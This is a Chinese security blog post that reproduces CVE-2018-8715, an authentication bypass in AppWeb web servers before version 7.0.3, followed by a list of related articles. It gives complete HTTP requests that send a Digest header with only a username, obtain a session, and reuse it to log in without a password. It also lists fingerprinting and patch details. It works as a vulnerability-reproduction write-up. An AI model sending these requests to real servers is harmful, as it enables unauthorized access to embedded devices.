AppWeb认证绕过漏洞(CVE-2018-8715)

最新推荐文章于 2024-05-29 13:35:56 发布
最新推荐文章于 2024-05-29 13:35:56 发布
阅读量2.2k 收藏 7
点赞数 1
分类专栏: 漏洞复现 文章标签: 前端 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/121072956
版权

AppWeb认证绕过漏洞

所有文章,仅供安全研究与学习之用,后果自负!

前言

AppWeb是Embedthis Software LLC公司负责开发维护的一个基于GPL开源协议的嵌入式Web Server。他使用C/C++来编写,能够运行在几乎先进所有流行的操作系统上。当然他最主要的应用场景还是为嵌入式设备提供Web Application容器。

AppWeb可以进行认证配置,其认证方式包括以下三种:

1.basic 传统HTTP基础认证
2.digest 改进版HTTP基础认证,认证成功后将使用Cookie来保存状态,而不用再传递Authorization头
3.form 表单认证

一、AppWeb认证绕过漏洞(CVE-2018-8715)

0x01 漏洞描述

其7.0.3之前的版本中,对于digest和form两种认证方式,如果用户传入的密码为null(也就是没有传递密码参数),appweb将因为一个逻辑错误导致直接认证成功,并返回session。
在这里插入图片描述

0x02 影响范围

7.0.3之前的版本

0x03 漏洞利用

利用该漏洞需要知道一个已存在的用户名,当前环境下用户名为admin

(1)构造头Authorization: Digest username=admin,并发送如下数据包:

GET / HTTP/1.1
Host: example.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Authorization: Digest username=admin

可见,因为我们没有传入密码字段,所以服务端出现错误,直接返回了200,且包含一个session:
在这里插入图片描述
(2)利用获取到的 session
修改请求头为POST 添加 session 请求体

POST / HTTP/1.1
Host: 192.168.157.129:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Authorization: Digest username=admin
 -http-session-=1::http.session::a80c399ad44f496ea43b7b3b6c594131
Upgrade-Insecure-Requests: 1
Content-Length: 18

username=admin

认证绕过成功

在这里插入图片描述

0x04 漏洞修复

打补丁,升级到最新版本~

0x05 指纹

响应头中 存在

WWW-Authenticate: Digest

在这里插入图片描述

总结

利用该漏洞需要知道一个已存在的用户名

LuckyCharm~
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
复现AppWeb认证绕过CVE-2018-8715
weixin_51566481的博客
07-20 199
复现AppWeb认证绕过CVE-2018-8715
CVE-2018-8715(AppWeb认证绕过漏洞)
weixin_51387754的博客
10-26 922
漏洞简介 漏洞编号:CVE-2018-8715 影响版本:7.0.3之前的版本 https://www.cvedetails.com/cve/CVE-2018-8715/ 漏洞产生原因: AppWeb可以进行认证配置,其认证方式包括以下三种: basic 传统HTTP基础认证 digest改进版HTTP基础认证认证成功后将使用Cookie来保存状态,而不用再传递Authorization头 form 表单认证 其7.0.3之前的版本中,对于digest和form两种认证方式,如果用户传入的密码为nul
五种不寻常的身份验证绕过技术
最新发布
2401_84488651的博客
05-29 1243
就在过期之前,应用程序在终端/refresh/tokenlogin中向后端服务器发送了一个请求,该请求在标头和HTTP主体部分的用户名参数中包含有效的身份验证令牌。复杂的身份验证机制可能成为攻击者使用的最具隐蔽性的攻击手段,特别是在容易出现业务逻辑漏洞的应用程序上。进一步的测试表明,删除请求上的Authorization标头并更改HTTP主体上的用户名参数将为提供的用户名创建一个新的有效令牌。乍一看,它似乎是安全的,但对后端请求的分析显示,应用程序在重定向响应上返回了异常大的内容长度(超过40000字节)
AppWeb 身份验证绕过漏洞 (CVE-2018-8715)复现实验报告
weixin_48400575的博客
01-27 2414
AppWeb 身份验证绕过漏洞 (CVE-2018-8715)复现实验报告
WKWebView iOS9 加载H5界面失败
iosYangming的博客
08-28 6154
前几天看到群里面的小伙伴说碰到一个奇怪的问题, 说 WKWebView 加载H5界面, 在iOS10 ,iOS11上都可以,但是iOS9就会失败. 当时想了一下WKWebView是在iOS8 推出来的, API接口都是一样的,怎么会不好用, 一开始觉得代码写错了. 但是想到WKWebView加载H5,也就几句代码的事情,又能出什么问题. 然后怀疑前端是不是限制iOS运行的版本, 回答也是没有...
[vulhub]appweb认证绕过漏洞--CVE-2018-8715
haoaaao的博客
04-28 361
0x00 前置 AppWeb是Embedthis Software LLC公司负责开发维护的一个基于GPL开源协议的嵌入式Web Server。他使用C/C++来编写,能够运行在几乎先进所有流行的操作系统上。当然他最主要的应用场景还是为嵌入式设备提供Web Application容器。 AppWeb可以进行认证配置,其认证方式包括以下三种: 1、basic 传统HTTP基础认证 2、digest 改进版HTTP基础认证认证成功后将使用Cookie来保存状态,而不用再传递Authorization头
Appweb——Embedded Web Server
张同光 (Tongguang Zhang):Hello everyone !
06-04 702
Appweb——Embedded Web Server
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
2. CVE-2018-15473:这个漏洞涉及到OpenSSH的公钥认证过程。如果攻击者能够操纵公钥文件的顺序,他们可能可以绕过特定的认证限制,从而获取未经授权的访问权限。 3. CVE-2018-15919:这是一个输入验证错误,可能...
Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906POC
09-04
Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906POC Tiki Wiki CMS Groupware或简称为Tiki(最初称为TikiWiki)是一种免费且开源的基于Wiki的内容管理系统和在线办公套件。在如下这些版本21.2, 20.4, 19.3, ...
OpenSSH 用户名枚举漏洞CVE-2018-15473).zip
03-06
OpenSSH 7.7及之前版本中存在用户枚举漏洞,该漏洞源于程序会对有效的和无效的用户身份验证请求发出不同的响应。 学习笔记
CVE-2018-18778.docx
07-23
CVE-2018-18778 ,mini_httpd任意文件读取漏洞
CVE-2020-11651(SaltStack认证绕过)漏洞复现
The current road is different, love needs to distinguish between right and wrong
11-28 530
SaltStack是使用Python开发的一个服务器基础架构集中化管理平台,底层采用动态的连接总线,使其可以用于编配,远程执行, 配置管理等等。Salt非常容易设置和维护,而不用考虑项目的大小。从数量可观的本地网络系统,到跨数据中心的互联网部署,Salt设计为在任意数量的server下都可工作。Salt的拓扑使用简单的server/client模式,需求的功能内建在一组daemon中。salt在几乎不改动配置的情况下就可以工作,也可以调整从而满足特定的需求。
身份验证绕过漏洞CVE-2023-20860)
zkaqlaoniao的博客
10-13 1740
Spring官方发布了Spring Framework 身份认证绕过漏洞(CVE-2023-20860),当Spring Security使用mvcRequestMatcher配置并将**作为匹配模式时,在Spring Security 和 Spring MVC 之间会发生模式不匹配,最终可能导致身份认证绕过
2024年网络安全最全CVE-2024-32532 认证绕过漏洞分析
2401_84281703的博客
05-03 1039
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化资料的朋友,可以点击这里获取。
Nacos 身份认证绕过漏洞(QVD-2023-6271)
feelxing的专栏
03-31 5424
Nacos 身份认证绕过漏洞(QVD-2023-6271),nacos版本从1.4.1升级到2.2.1最新版本
零基础入门网络安全(1)
2301_77121488的博客
04-27 883
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
PHP 输入验证漏洞 CVE-2018-10547
10-24
根据提供的引用内容,我没有找到与“PHP 输入验证漏洞 CVE-2018-10547”相关的信息。但是,我可以为您提供有关PHP漏洞的一些信息。 引用提到了PHP 7.1.x版本中的imap_mail函数null指针取消引用的漏洞,这是一个安全漏洞,攻击者可以利用该漏洞来执行任意代码或导致拒绝服务攻击。引用提到了University of Washington IMAP Toolkit 2007f命令注入漏洞,攻击者可以利用该漏洞来执行任意命令。引用提到了PHP 5.x和7.x版本中的另一个安全漏洞,攻击者可以利用该漏洞来导致拒绝服务攻击。 总的来说,PHP存在多个安全漏洞,这些漏洞可能会导致攻击者执行任意代码、执行任意命令或导致拒绝服务攻击。因此,建议开发人员在编写PHP代码时,要注意输入验证和安全性,以避免这些漏洞的出现。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值